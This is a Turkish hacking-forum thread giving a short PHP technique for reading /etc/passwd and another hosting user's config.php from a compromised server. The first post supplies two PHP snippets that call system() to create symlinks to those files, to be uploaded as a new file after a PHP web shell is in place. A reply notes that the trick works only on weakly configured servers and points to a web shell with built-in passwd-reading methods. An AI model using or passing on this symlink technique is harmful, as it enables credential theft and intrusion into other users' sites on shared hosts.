PHP ile ETC ve CONFIG Okuma

server cgi ve cmd shell yemiyor php shell yiyor onda'da komutlar çalışmıyorsa dosya yükleme fonksiyonu veya yeni dosya açma fonksiyonu açık bu taktikle s1k3r atarsınız. <?php...

server cgi ve cmd shell yemiyor php shell yiyor onda'da komutlar çalışmıyorsa dosya yükleme fonksiyonu veya yeni dosya açma fonksiyonu açık bu taktikle s1k3r atarsınız.

<?php
system('ln -s /etc/passwd file.txt');
?>


kullanımı server'da yeni php dosyasu açın bilmemanasınınami.php olarak dosyalari kayit edin .
file.txt olarak etc'yi çekiyor

config içinde
<?php
system('ln -s /home/etcuser/public_html/config.php file.txt');
?>
hadi vesselam
 
çoğu serverde system fonksiyonu dahil 2-3 fonksiyon daha kapalı. düşük derece serverlerde işe yarar bunlar. mkaspy shellde 6 adet passwd okuma tekniği var zaten hiç uğraşmayın onla okuyun çee
 
131,853Konular
3,272,024Mesajlar
316,393Kullanıcılar
thompt34Son Üye
Üst Alt